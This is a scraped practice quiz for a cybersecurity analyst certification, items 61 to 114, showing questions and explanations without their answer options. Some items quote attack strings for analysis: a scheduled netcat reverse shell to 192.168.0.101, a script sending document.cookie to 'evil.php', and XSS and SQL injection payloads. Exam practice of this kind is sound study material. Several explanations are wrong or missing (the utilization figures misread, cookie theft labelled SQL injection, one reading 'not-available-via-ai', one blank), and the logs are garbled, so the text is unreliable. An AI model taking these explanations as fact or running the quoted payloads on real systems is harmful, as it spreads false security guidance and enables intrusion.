The correct answer is virtual hosts. In a vulnerability report, it is important to include information about the organization's virtual hosts. Virtual hosts are used to host multiple websites or applications on a single physical server, and they can introduce vulnerabilities if not properly secured. Including virtual hosts in the report will help the analyst identify any potential vulnerabilities or weaknesses in the organization's virtual hosting environment.

Submit
61. A cybersecurity analyst was hired to resolve a security issue within a company after it has been reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that brute force attack was launched against the company. Which of the following remediation actions can the cybersecurity analyst recommend to the senior management to address these security issues?

Explanation

The cybersecurity analyst can recommend deploying multifactor authentication as a remediation action to address the security issues. This is because multifactor authentication adds an extra layer of security by requiring users to provide multiple forms of identification, such as a password and a unique code sent to their mobile device, before accessing their accounts. This would help prevent unauthorized access even if the passwords are compromised through a brute force attack.

Submit
62. Following a security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediation based on current events and emerging threat vectors to specific stakeholders. Which of the following is this considered to be?

Explanation

The given scenario describes a post-mortem analysis conducted after a security breach. The analysis involves discussing potential impacts, mitigations, and remediation based on current events and emerging threat vectors. This process is known as threat intelligence, which refers to the collection, analysis, and dissemination of information about potential threats to an organization's security. It helps organizations understand the nature of the threats they face and make informed decisions to protect their systems and data.

Submit
63. A security analyst has noticed an alert from the SIEM. A workstation is repeatedly trying to connect to port 445 of a file server on the production network. All of the attempts are made with invalid credentials. Which of the following describes what is occurring?

Explanation

The repeated attempts to connect to port 445 with invalid credentials suggest that an attacker has gained control of the workstation and is attempting to pivot the file server by creating an SMB session. This behavior indicates an unauthorized and malicious activity, where the attacker is using the compromised workstation as a stepping stone to gain access to the file server.

Submit
64. A security administrator recently deployed and verified the installation of a critical patch issued by the company's primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from the network. However, the administrator just ran vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of following if the MOST likely explanation for this ?

Explanation

The most likely explanation for the networked systems still reporting the same vulnerability after the patch was applied is that the patch did not successfully fix the vulnerability. This means that the patch either did not address the specific vulnerability or was not properly installed on the systems. It is important for the administrator to investigate further and ensure that the patch is applied correctly or seek alternative solutions to fix the vulnerability.

Submit
65. A security analyst received a compromised workstation. The workstation's hard drive many contain evidence of criminal activities. Which of the following is the FIRST thing that analyst must do to ensure the integrity of the hard drive while preforming the analysis?

Explanation

To ensure the integrity of the hard drive while performing the analysis, the security analyst must use write blockers. Write blockers are hardware or software tools that prevent any write operations on the hard drive, ensuring that no changes or modifications are made to the original evidence. By using write blockers, the analyst can securely examine the contents of the compromised workstation's hard drive without the risk of inadvertently altering or contaminating the evidence.

Submit
66. AN alert has been distributed throughout the information security community regarding a critical Apache vulnerability. Which of the following courses of action would ONLY identify the know vulnerability?

Explanation

Performing a scan for the specific vulnerability on all web servers would ONLY identify the known vulnerability because it focuses specifically on scanning for that particular vulnerability on the web servers. The other options involve different types of scans (unauthenticated vulnerability scan, web vulnerability scan, authenticated scan) which may identify other vulnerabilities as well, but they do not guarantee that they will specifically identify the known vulnerability mentioned in the alert.

Submit
67. Law enforcement has contacted a corporation's legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. AN  employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach?

Explanation

To prevent further disclosure of information about the breach, it is important to increase security awareness about incident communications channels. This means educating employees about the proper channels and protocols for discussing and sharing information related to security incidents. By doing so, employees will be more likely to understand the importance of keeping such information confidential and will be less likely to share it on social media or with the media. This step helps to ensure that employees are aware of the appropriate ways to handle sensitive information and reduces the risk of further disclosure.

Submit
68. A company wants to update its acceptable use policy (AUP) to ensure it related to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely in the AUP?

Explanation

The most likely inclusion in the acceptable use policy (AUP) would be that guests using the wireless network should provide valid identification when registering their wireless devices. This requirement aligns with the newly implemented password standard and ensures that only authorized individuals are able to access the network. It also helps to maintain security and accountability for any actions taken on the network.

Submit
69. A security professional is analyzing the results of a network utilization report. The report includes the following:IP address           Server Name             Server Uptime          Historical                Current172.20.2.58          web.srvr.03            30D 12H 52M 09S     41.3BG                   37.2GB172.20.2.125        dev.web.srvr.01     30D 12H 52M 09S     1.81GB                   2.2GB172.20.2.22          hr.dbprod.01          30D 12H 17M 22S     2.24GB                   29.97GB172.20.2.26          mrktg.file.srvr.02    30D 12H 41M 09S     1.23GB                   0.34GB172.20.2.28          accnt.file.srvr.01    30D 12H 52M 09S      3.62GB                  3.57GB172.20.2.30          R&D.file.srvr.01     1 D 4 H 22 M 01S       1.24GB                  0.764GBWhich of the following servers needs further investigation? 

Explanation

The server "hr.dbprod.01" needs further investigation because it has the highest current utilization compared to its historical utilization. The current utilization is 2.24GB, while the historical utilization is 29.97GB, indicating a significant decrease in usage. This discrepancy suggests that there may be a potential issue or anomaly with the server's performance or data usage, warranting further investigation by the security professional.

Submit
70. A cybersecurity analyst is retained by a firm from an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.Given the following snippet of codesc config schedule start autonet start schedule​at 13:30 ""C:\nc.exe 192.168.0.101 777 -e cmd. exe " "​Which of the following combinations BEST describes the situation and recommendations to be made for this situation

Explanation

The given correct answer suggests that the cybersecurity analyst has found evidence of host 192.168.0.101 using Windows Task Scheduler to run the nc.exe file at 13:30. This indicates suspicious activity, as the nc.exe file is often associated with network scanning or malicious activity. The recommendation is to proceed with the next step of removing the host from the network, as it poses a potential security threat.

Submit
71. A security analyst is reviewing the following log after enabling key-based authentication Dec 21 11:00:57 CompTIA sshd(5657): Failed password for root from 95.58.255.62 port 38980 ssh2​Dec 21 20:08:26 CompTIA sshd(5768): Failed password for root from 91.205.189.15 port 38156 ssh2​Dec 21 20:08:30 CompTIA sshd (5770): Failed password for nobody from 91.205.189.15 port ssh2​Dec 21 20:08:34 CompTIA sshd(5772): Failed password for invalid user asterisk from 91.205.189.15 port 38864 ssh2Dec 21 20:08:38 CompTIA sshd(5774): Failed password for invalid user sjobeck from 91.205.189.15 port 39647 ssh2Dec 21 20:08:42 CompTIA sshd(5776): Failed password for root from 91.205.189.15 port 39467 ssh2​Given the above information, which of the following steps should be preformed NEXT to secure the system? 

Explanation

Based on the log, it can be observed that there are multiple failed password attempts for the root user and invalid user accounts. This indicates that the system is vulnerable to brute-force attacks. To secure the system, the next step should be to disable password authentication for SSH. This will prevent attackers from guessing passwords and gaining unauthorized access to the system. Instead, key-based authentication should be used, which is more secure and less prone to brute-force attacks.

Submit
72. An organization is attempting to harden its web server and reduce the information that might be disclosed by potential attackers. A security analyst is reviewing vulnerability scan results from a recent web server scan.Portions of the scan results are shown below​Finding#5144322​First Time Detected 10 Nov 2015 09:00 GMT-0600Last Time Detected 10 Nov 2015 09:00 GMT-0600CVSS Base: 5​Access Path: http:/myOrg.com/mailingList.htm​Request: GET https://myOrg.com/mailingList.aspx?content=volunteer​Response> C:\Dosuments\MarySmith|mailingList.pdf​Which of the following line indicates information disclosure about the host needs to be remediated?

Explanation

The line "Response: C:\Documents\MarySmith\mailingList.pdf" indicates information disclosure about the host that needs to be remediated. This line shows the file path and name of a PDF document that is being disclosed in the server's response. This information could potentially be valuable to attackers as it reveals the location and name of a file on the server, which could be used for further exploitation or unauthorized access. Hardening the web server should involve removing or securing any sensitive information that is being disclosed in the server's responses.

Submit
73. Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation?

Explanation

A cybersecurity analyst should use Shalsum to verify the integrity of a forensic image before and after an investigation. Shalsum is a tool that calculates and verifies the checksum of a file. By comparing the checksums before and after the investigation, the analyst can ensure that the forensic image has not been tampered with or altered. This is crucial for maintaining the integrity and reliability of the evidence collected during the investigation.

Submit
74. A cybersecurity analyst has run a vulnerability scan and found inconsistent results from organizations database servers. The results often appear incomplete compared to other servers in the domain. Which of the following provides the BEST way to arrive at a complete scan of database server?

Explanation

A credentialed scan is the best way to arrive at a complete scan of the database server because it allows the scanner to authenticate and gain access to the server using valid credentials. This ensures that the scanner has the necessary privileges to fully scan the server and retrieve all the relevant information. Without proper credentials, the scanner may be limited in its ability to access certain areas of the server, resulting in incomplete results.

Submit
75. External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped the issue?

Explanation

Stress testing would have helped identify the performance issues in the web application. By subjecting the application to high levels of concurrent users, heavy loads, or extreme data volumes, stress testing helps to determine the application's stability, responsiveness, and reliability under such conditions. Through stress testing, any bottlenecks, resource limitations, or performance issues causing the application to slow down or time out could have been identified and addressed, improving the overall performance and user experience.

Submit
76. The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious e-mail that has been reported by multiple users. The analyst has determined the e-mail includes an attachment named invoice.zip that contains the following files: Locky.js, xerty.ini, xerty.lib. Further analysis indicated that when the .zip is opened, it is installing a new version id ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS form being encrypted by infected devices?

Explanation

The first step to prevent data on the company NAS from being encrypted by infected devices is to email employees instructing them not to open the invoice attachment. By informing employees about the suspicious email and advising them not to open the attachment, the company can minimize the risk of the ransomware spreading through the network. This proactive measure helps to raise awareness among employees and prevent further infections. Disabling access to the company VPN, setting permissions on file shares to read-only, and adding the URL included in the .js file to the company's web proxy filter can be additional steps taken to enhance security, but they should be implemented after instructing employees about the suspicious attachment.

Submit
77. A new policy requires the security team to preform web applications and OS Vulnerability scan. All of the company's web applications use federated authentications and are accessible via a central portal. Which of the following should be implemented to ensure a more scan of the company's web applications, while at the same time reducing false positives?

Explanation

To ensure a more accurate scan of the company's web applications and reduce false positives, the vulnerability scanner should be configured to perform authenticated scans. Authenticated scans allow the scanner to log in to the web applications using valid credentials, giving it a deeper understanding of the application's vulnerabilities and reducing the chances of false positives. By authenticating with the application, the scanner can access restricted areas and test functionalities that may not be available to anonymous users, providing a more comprehensive assessment of potential vulnerabilities.

Submit
78. During a review of security controls, an analyst was able to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to​Based on the ACL's above, which of the following explain why the able to connect to the FTP server? 

Explanation

The analyst was able to connect to the FTP server because FTP was explicitly allowed in sequence 8 of the ACL.

Submit
79. In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerable. The Chief Office (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed?

Explanation

The best way to proceed is to reduce the scan to items that are classified as critical in the asset inventory and resolve these issues first. This approach prioritizes the vulnerabilities that pose the highest risk to the organization's regulatory compliance objectives for the storage of PHI. By focusing on the critical items, the organization can efficiently allocate its resources and address the most important vulnerabilities in a timely manner. This helps ensure that the organization is taking appropriate measures to protect the confidentiality and integrity of PHI.

Submit
80. A threat intelligence analyst who works for a technology firm received this report from a vendor:​"There has been an intellectual property theft executed again organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector."​Which of the following combinations suggest how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity?

Explanation

The report mentions that there has been intellectual property theft targeting R&D data in the technology industry. It also states that the data exfiltration occurs over months using uniform TTPs. This suggests that the threat is an Advanced Persistent Threat (APT) and the most helpful analysis in protecting against this activity would be behavioral analysis. APTs are sophisticated and persistent attacks, and analyzing their behavior can help identify patterns, tactics, and techniques used by the attackers, allowing for better detection and defense against future attacks.

Submit
81. An incident report indicated a virus was introduced though a remote host that was connected to corporate resources. A cybersecurity analyst has been asked for a recommendation to solve this issue. Which of the following should be applied.

Explanation

NAC stands for Network Access Control. In this scenario, the incident report states that a virus was introduced through a remote host connected to corporate resources. NAC is a security solution that helps prevent unauthorized access to a network by enforcing policies and authentication measures. By implementing NAC, the cybersecurity analyst can recommend a solution that will ensure that only authorized devices and users are allowed access to the corporate resources, thereby mitigating the risk of future virus introductions through remote hosts.

Submit
82. A malicious user is receiving the following output​root:~#ping 192.168.1.137​64 bytes from 192.168.2.1 icmp_seq=1 ttl=63 time=1.58 ms​64 bytes from 192.168.2.1 icmp_seq=2 ttl=63 time=1.58 ms​Based on the above output, which of the following is the device between the malicious user and the target?

Explanation

Based on the given output, the device between the malicious user and the target is a proxy. This can be inferred from the fact that the IP address 192.168.2.1 is responding to the ping requests. A proxy server acts as an intermediary between clients and servers, forwarding requests from clients to servers and returning responses from servers to clients. In this case, the proxy is intercepting the ping requests from the malicious user and forwarding them to the target.

Submit
83. A cybersecurity analyst has several SIEM event logs to review for possible APT activity.  The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to preform?

Explanation

The best approach for the cybersecurity analyst is to analyze the threads of the events while manually reviewing them to see if any of the indicators match. This approach allows the analyst to carefully examine the event logs and look for any patterns or indicators that may indicate APT activity. By manually reviewing the events, the analyst can identify any suspicious behavior or connections that may be related to APTs. This method ensures a thorough investigation and increases the chances of detecting any potential threats.

Submit
84. A security analyst is to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials for traversing the network while still conducting a credential scan, which of the following is the BEST choice?

Explanation

Installing agents on the endpoints to perform the scan is the best choice because it allows the vulnerability scan to be conducted without the credentials traversing the network. By installing agents on the endpoints, the scan can be performed locally on each endpoint without the need for credentials to be transmitted across the network. This ensures that the credentials remain secure and reduces the risk of them being intercepted or compromised during the scan.

Submit
85. An application development company released da new version of its software to the public. A few days after the release, the company is notified by end users the application is notably slower, and older security bugs have reappeared in the new release. The development team has decided to include the security analyst during their next development cycle to help address to reported issues. Which of the following should the analyst focus on to remedy the existing reported problems?

Explanation

The security analyst should perform security regression testing during each application development cycle. This is because security regression testing helps identify any security vulnerabilities or bugs that may have been reintroduced or not properly addressed in the new release. By conducting this type of testing regularly, the analyst can ensure that any reported security issues are identified and resolved before the software is released to the public. This helps maintain the security and performance of the application, addressing the concerns raised by the end users.

Submit
86. A security analyst of a small regional back has received an alert that nation states are attempting financial institutions via phishing campaigns. Which of the following techniques would the analyst recommend as a proactive measure to defend against this type of threat?

Explanation

Location-based Network Access Control (NAC) would be recommended as a proactive measure to defend against phishing campaigns by nation states. This technique allows the security analyst to restrict access to the network based on the location of the user or device. By implementing location-based NAC, the analyst can ensure that only authorized users within the region or area are allowed access to the network, reducing the risk of unauthorized access from nation state actors attempting phishing attacks. This helps to strengthen the overall security posture of the small regional bank and mitigate the potential impact of such threats.

Submit
87. A security analyst has been notified by the IDS that website XYZ is under attack. Analysis of the web logs shows the following string:​INSERT INFO message <Script>source=https://comptiasite.com</script>​Which of the following attacks is occurring?

Explanation

The given string "" is a classic example of a cross-site scripting (XSS) attack. XSS attacks occur when an attacker injects malicious code into a website, which is then executed by unsuspecting users. In this case, the attacker is attempting to insert a script tag that redirects users to a different website. This can lead to various security vulnerabilities, such as stealing sensitive information or performing unauthorized actions on behalf of the user.

Submit
88. The Chief Information Office (CIO) of a company has been receiving an increased amount of spam in the last month. The CIO has not signed up for any newsletter or given contact information to any venders during this time frame. Which of the following techniques would a cybersecurity analyst employ to duplicate an external actor's methods of uncovering the CIO's e-mail address (select two)

Explanation

The correct answer is social media profiling and email harvesting. Social media profiling involves gathering information about an individual from their social media accounts, which could potentially reveal their email address. Email harvesting is the process of collecting email addresses from various sources, such as websites or online directories. Both techniques can be used by an external actor to uncover the CIO's email address without the CIO directly providing their contact information to any vendors or newsletters.

Submit
89. A cybersecurity analyst has received an alert that well-known "call home" messaged are continuously observed by network sensors at network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely causes?

Explanation

The correct answer is "Commands are attempting to reach a system infected with a botnet trojan." This is the most likely cause because the alert indicates that "call home" messages are continuously observed by network sensors, which suggests that a system infected with a botnet trojan is receiving commands from a remote network. The proxy firewall successfully drops these messages, indicating that it is effectively blocking the communication between the infected system and the remote network.

Submit
90. A security administrator for a bank branch office preformed a routine vulnerability assessment. The assessment yielded a critical vulnerability that is providing administrative access to affected systems without passwords. because every system was affected by the vulnerability, the administrator much not prioritize which system should be remediated first. Judging the role of systems by the host name, which of the following should be the administrator prioritize first?

Explanation

The administrator should prioritize remediating SERVER-DC01.bank.local first because it is likely a domain controller for the bank's network. Domain controllers are critical components of a network, responsible for authenticating users and controlling access to resources. If an attacker gains administrative access to a domain controller, they could potentially compromise the entire network. Therefore, addressing the vulnerability on the domain controller should be the top priority to prevent unauthorized access and protect the overall security of the bank's systems.

Submit
91. After completing a vulnerability scan, the following output was noted:CVE-2011-3389QID 42366 - SSlv3.0 / TLSv1.o protocol weak CBC mode Server side vulnerabilityCheck with:cpenssl s_client -connect qualys.jlive.mobile.com:443 - tlsl -ciper :AES: CAMELLA:SEED:3DES:DESWhich of the following vulnerabilities have been identified ?

Explanation

The correct answer is "Web application cryptography vulnerability". This is indicated by the output of the vulnerability scan, which identifies a specific vulnerability related to the SSLv3.0 / TLSv1.0 protocol weak CBC mode server side vulnerability. This vulnerability is related to the cryptography used in web applications, indicating a potential weakness in the encryption used by the application. This vulnerability could potentially be exploited to compromise the security of the web application and its data.

Submit
92. Following a data compromise, a cybersecurity analyst noticed the following executed query:​Select * from Users WHERE name = rick or 1=1​Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack

Explanation

The executed query "Select * from Users WHERE name = rick or 1=1" indicates a SQL injection attack. In this attack, the attacker exploits a vulnerability in the application's input validation, allowing them to inject malicious SQL code into the query. Parameter validation is the best technical security control to reduce the risk of future impact from this attack. By properly validating and sanitizing user input, the application can prevent the injection of malicious SQL code and ensure that only valid parameters are used in the query. This helps to protect the database from unauthorized access and manipulation.

Submit
93. A cybersecurity analyst is currently investigating a server outage. The analyst has discovered the following value was entered for the user name: 0xbfff601a. Which of the following attacks may be occurring?

Explanation

The value "0xbfff601a" is a hexadecimal value that is commonly associated with a formatting string attack. In a formatting string attack, an attacker can exploit a vulnerability in a program that uses formatted input/output functions to manipulate the program's memory and execute arbitrary code. This can lead to unauthorized access, data leakage, or system compromise. In this case, the unusual value entered for the user name suggests an attempt to exploit such a vulnerability.

Submit
94. A company is running Microsoft on a file server. A vulnerability scan returned the following result:​Vulnerable software installed: office 2007​HKEY_LOCAL_MACHINE\Software\Microsoft\Windows|CurrentVersion|Installer|Userdata S-1-5-18\Products\000021095F01000000100000000F01FEC\InstallProperties -key exists The Office component Microsoft Office Excel Services is running an affected version - 12.0.6612.1000 HKEY_LOCAL_MACHINE\software\Microsoft\windows|CurrentVersion\Installer\UserData\S-1-5-18\ Products\000021095F01000000100000000F01FE\Patches\F6A389258DE0​16A46B54137BE2278095A - key does not exist patch { 52983A6F-OED8-4A61-B645-31B72E7208A9} is not installed ​Which of the following would provide the MOST efficient method of remediating this finding?

Explanation

The vulnerability scan has identified that the file server is running an affected version of Microsoft Office Excel Services. The scan also indicates that a specific patch is not installed on the server. Therefore, the most efficient method of remediation would be to install the missing patches on the server. This would help to address the vulnerability and ensure that the software is up to date with the necessary security fixes.

Submit
95. A security analyst is reviewing logs and discovers that a company-owned computer is issued to an employee is generation many alerts and warnings. The analyst continues to review the log evens and discovers that a non company-owned device from a different unknown IP address is generation the same events. The analyst informs the manger of these findings, and the manager explains that these activities are already known and part of an on going simulation. Given this scenario, which of the following roles are the analyst, the employee and the manager filing ?

Explanation

In this scenario, the security analyst is reviewing logs and discovering that a non company-owned device is generating alerts and warnings on a company-owned computer issued to an employee. The analyst informs the manager about these findings and the manager explains that these activities are part of an ongoing simulation. Based on this information, the analyst is playing the role of the blue team, responsible for monitoring and defending the company's systems. The employee is playing the role of the red team, responsible for simulating attacks and identifying vulnerabilities. The manager is playing the role of the white team, responsible for overseeing and coordinating the simulation exercise.

Submit
96. The software development team pushed a new web application into production for the accounting department. Shortly after application was published, the head of accounting department informed IT operations that the application was not preforming as intended. Which of the following SDLC best practices was missed?

Explanation

User acceptance testing is a crucial step in the software development life cycle (SDLC) that ensures the application meets the requirements and expectations of the end users. By not conducting user acceptance testing, the development team missed the opportunity to gather feedback from the accounting department and identify any issues or discrepancies before the application was deployed into production. This could have helped in addressing the performance issues reported by the head of the accounting department and ensuring a smoother user experience.

Submit
97. The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Password may be stored in browsers and retrieved. ​The analyst reviews a snippet of the following code:​<form action>"authenticate.php">Username:<br>​<input type: "text" name="username" Value="" autofocus><br>Password: <br><input type="password" name="password" value maxlength="32"><br>​<input type ="submit" value='submit'>​</form>​Which of the following is the BEST course of action based on the above warning and code snippet?

Explanation

The correct answer suggests that the organization should update the browser Group Policy Object (GPO) to resolve the issue. This is because the autocomplete feature in the HTML form/input is not disabled, which can potentially store and retrieve passwords in browsers. By updating the browser GPO, the organization can enforce the necessary security settings to disable autocomplete and prevent the storage of passwords.

Submit
98. An analyst has initiated an assessment of an organization's security posture. As part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the accomplish this goal? (select two)

Explanation

The analyst can determine how much information about the organization is exposed externally by conducting internet searches and scouring social network sites. Internet searches can reveal publicly available information about the organization, such as website content, news articles, and public records. Scouring social network sites can provide insights into what employees or individuals associated with the organization are sharing publicly, which can potentially expose sensitive information. These techniques allow the analyst to gather information from external sources to assess the organization's security posture.

Submit
99. Given the following code:<script type="text/javascript">​var adr = ". ./evil.php?breadmonster=' +escape (document.cookie) ;​var quary query = "SELECT * FROM users WHERE name = 'smith';</SCRIPT>​Which of the following types of attacks is occurring in the example above?

Explanation

The given code is vulnerable to SQL injection. SQL injection is a type of attack where an attacker injects malicious SQL statements into an application's database query. In this code, the variable "query" is not properly sanitized or validated, allowing an attacker to manipulate the SQL query and potentially gain unauthorized access to the database.

Submit
100. A security analysis is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot purchase a data loss prevention (DLP) system. which of the following recommendations should the security analyst make to provide defense-in depth against data loss? (select three)

Explanation

The security analyst should recommend preventing users from accessing email and file-sharing via web proxy, as this would restrict their ability to send sensitive data outside the network. They should also suggest preventing flash drives from connecting to USB ports using Group Policy, as this would prevent employees from easily copying data onto portable storage devices. Additionally, the analyst should recommend preventing internet access on laptops unless connected to the network in the office or via VPN, as this would limit the potential for data exfiltration through unauthorized internet connections.

Submit
101. Creating a lessons learned report following an incident will help an analyst to communicate which of the following information.

Explanation

Creating a lessons learned report following an incident will help an analyst communicate the root cause analysis of the incident and the impact it had on the organization. This report will provide valuable insights into the factors that led to the incident and the consequences it had on the organization's operations. Additionally, the report will also highlight enhancements to the policies and practices that can be implemented to improve the organization's response to similar incidents in the future.

Submit
102. A security analyst has requested to see specific security information to verify if there are any vulnerable area in the network that can be attacked from any external IP address. Which of the following types of information would need to be provided?

Explanation

To verify if there are any vulnerable areas in the network that can be attacked from any external IP address, the security analyst would need to review the Firewall ACL logs. These logs contain information about the rules and policies implemented in the firewall, including the allowed and denied traffic. By analyzing these logs, the analyst can identify any potential security vulnerabilities or unauthorized access attempts from external IP addresses.

Submit
103. A company has been a victim of multiple volumetric DoS attacks. Packet of the offending traffic shows the following​09:23:45. 058939 IP 192.168.1.1:2562 > 170.43.30.4:0: Flags[ ], seq 1887775210:1887776670, win 512, length 146009:23:45. 058940 IP 192.168.1.1:2563 > 170.43.30.4:0: Flags[ ], seq 1887775211: 1887776671, win 512 length 146009:23:45. 058941 IP 192.168.1.1:2564 > 170.43.30.4:0: Flags[ ], seq 1887775212: 1887776672, win 512 length 146009:23:45. 058942 IP 192.168.1.1:2565 > 170.43.30.4:0: Flags[ ], seq 1887775213: 1887776673, win 512 length 1460​Which of the following mitigation techniques is MOST effective against the above attack? 

Explanation

The given packet shows that the source IP address is 192.168.1.1, which is a private IP address according to RFC 1918. Volumetric DoS attacks often involve spoofed IP addresses, including private IP addresses. By contacting the upstream ISP and asking them to drop RFC 1918 traffic, the company can effectively block the attack traffic that is using a private IP address as the source. This is the most effective mitigation technique in this scenario.

Submit
104. Given the following access log:​Access _log: 10.1.1.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/a? .aspectRatio : this.orginalSize.height&7c&cl&3ba=e (HTTP/1.1" 403 22 access_log 10.2.2.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/a? .aspectRatio this. orginalSize.height |   |    1; a=e (HTTP/1.1"303 333 Access _log: 10.1.1.3 - - [ 66.666.132.6 -100] "Get/ja/query-ui/ja/1]) ;F.optgroup=F .option;F .tbody=f .colorgroup=F /caption=F .thread; F .th=F .td; id (!c.support.htmlserialize) F.default= (1, HTTP/1.1" 403 338Which of the following accurately describes what this log displays?

Explanation

not-available-via-ai

Submit
105. An organization uses common Vulnerability Scoring System (CVSS) scores to prioritize remediation of vulnerabilities. Management wants to modify the priorities based on a difficult factor so that vulnerabilities with lower CVSS scores may get higher priority if they are easier to implement with less risk to the system functionality. Management also wants to qualify the priority. Which of the following  would achieve managements objective?

Explanation

The correct answer is (CVSS Score)* Difficulty =Priority, where difficulty is a range from 1 to 10 with 10 being the easiest and lowest risk to implement. This formula allows management to modify the priorities based on a difficulty factor, giving higher priority to vulnerabilities with lower CVSS scores if they are easier to implement with less risk to the system functionality. By using a scale of 1 to 10 for difficulty, the organization can accurately qualify the priority of each vulnerability.

Submit
106. A cybersecurity analyst was asked to secure the Chief Executive Officer's (CEO's) home WiFi Internet segment. The segment has a server has a server that can use directory services. Which of the following protocols would be analyst select if using WPA Enterprise?

Explanation

The correct answer is RADIUS. RADIUS (Remote Authentication Dial-In User Service) is a networking protocol that provides centralized authentication, authorization, and accounting management for users who connect and use a network service. It is commonly used in enterprise WiFi networks, including WPA Enterprise, to authenticate users and devices before granting them access to the network. RADIUS allows for secure and efficient authentication, making it an appropriate choice for securing the CEO's home WiFi Internet segment.

Submit
107. An organization followed an SDLC process for vulnerability remediation from development (DEV) through staging (STG) to production (PROD). the organization found that this process took to long and provided no additional security value. Which of the following vulnerability management processes is the BEST approach for this organization?

Explanation

The best approach for this organization would be to remediate both DEV and STG concurrently, test them, and then remediate PROD. This approach ensures that vulnerabilities are addressed in both the development and staging environments simultaneously, reducing the overall time taken for the remediation process. Additionally, testing after remediation in DEV and STG allows for verification of the effectiveness of the remediation measures before applying them to the production environment. This approach strikes a balance between efficiency and security value by addressing vulnerabilities at multiple stages of the SDLC.

Submit
108. A security analyst is preforming a static code of a review of a web application that includes a blog. The comment sections contain the following snippet:<script>​var d = document.getElement ById ("userComment"). value; document. getElementById ("displayComment") .innerHTML =usercomment

Explanation

The given snippet of code is vulnerable to cross-site scripting (XSS) attack. This is because the user input from the comment section is directly inserted into the HTML without proper validation or sanitization. An attacker can exploit this vulnerability by injecting malicious code into the comment section, which will then be executed by other users visiting the web application. This can lead to various attacks such as stealing sensitive information, hijacking user sessions, or defacing the website.

Submit
109. After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company's computer .16:26:42.943463 IP 192.168.1.10:25 > 10.38.219.20:3389  Flags [P.] seq 1768:1901, ack1, win 511, options [nop, nop TS val 271989777 ecr 475239494], length 133will prevent further access ONLY to the unauthorized service and will not impact other services?

Explanation

The correct answer is "DENY TCP ANY HOST 10.38.219.20 EQ 3389". This rule will deny any TCP traffic from any source to the host with IP address 10.38.219.20 on port 3389. Since the unauthorized service is running on this specific port, denying traffic to this port will effectively prevent further access to the unauthorized service. The other rules mentioned in the options either deny traffic to different ports or different IP addresses, which would not be effective in stopping the unauthorized service.

Submit
110. A security analyst has noticed that a particular server has consumed over 1TB of bandwidth over the course of a month. It has port 3333 open, however, there have not been any alerts or notices regarding the server or its archives. Which of the following did the analyst discover?

Explanation

The analyst discovered a zero day vulnerability on the server. A zero day vulnerability refers to a security flaw that is unknown to the software vendor and does not have a patch or fix available. This vulnerability allowed the server to consume a large amount of bandwidth without triggering any alerts or notices.

Submit
111. ​A security analyst is conducting traffic analysis and observes an HTTP POST to a web server. The POST header is approximately 1,0000 bytes in length. During transmission, one byte is delivered every 10 seconds. Which of the following attacks is this traffic indicative of?

Explanation

The given scenario describes a situation where a large amount of data is being slowly transmitted over HTTP POST. This behavior is indicative of exfiltration, which refers to the unauthorized extraction of data from a network. In this case, the attacker is slowly sending the data to avoid detection and to successfully exfiltrate the information from the web server. This method allows the attacker to bypass security measures and transfer sensitive data without raising suspicion.

Submit
112. An analyst is reviewing logs for a web application and discovers the following log snippet:​https://192.168.1.100/page.asp?variable-<script>alret('Test') <script>&u-user1&p-#$^()*@&uid-1289​Which of the following vulnerabilities has been tested?

Explanation

The correct answer is XSS (Cross-Site Scripting). This vulnerability is indicated by the presence of the script tag and the alert function in the log snippet. XSS allows attackers to inject malicious scripts into web pages viewed by other users, leading to various attacks such as stealing sensitive information or hijacking user sessions.

Submit
113. A cybersecurity analyst is reviewing the following outputs:​root@kali!# hping3 -s -p 80 192.168.1.19​HPING 192.168.1.19 (eth0 192.168.1.19) : s set, 40 headers + 0 data bytes​Len=46 ip=192.168.1.19 ttl_64 DF id+28319 sport=80 flags=RA seq=0 win=0 rtt=0. 6 msroot@kali!# hping3 -s -p 80 192.168.1.19HPING 192.168.1.19 (eth0 192.168.1.19) : s set, 40 headers + 0 data bytesLen=46 ip=192.168.1.19 ttl_64 DF id+28319 sport=8080 flags=RA seq=0 win=29200 rtt-11.9​Which of the following can the analyst infer from the above output?

Explanation

The analyst can infer from the output that the remote host is running a service on port 8080. This is indicated by the presence of the "sport=8080" in the output, which suggests that the remote host is actively listening on port 8080 and responding to the hping3 packets sent to that port.

Submit
114. A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as "root" and browsing the internet. The administrator determines this by preforming an annual review of the security logs on that server. For which of the following security architecture area should the administrator recommend review and modification? (select two)

Explanation

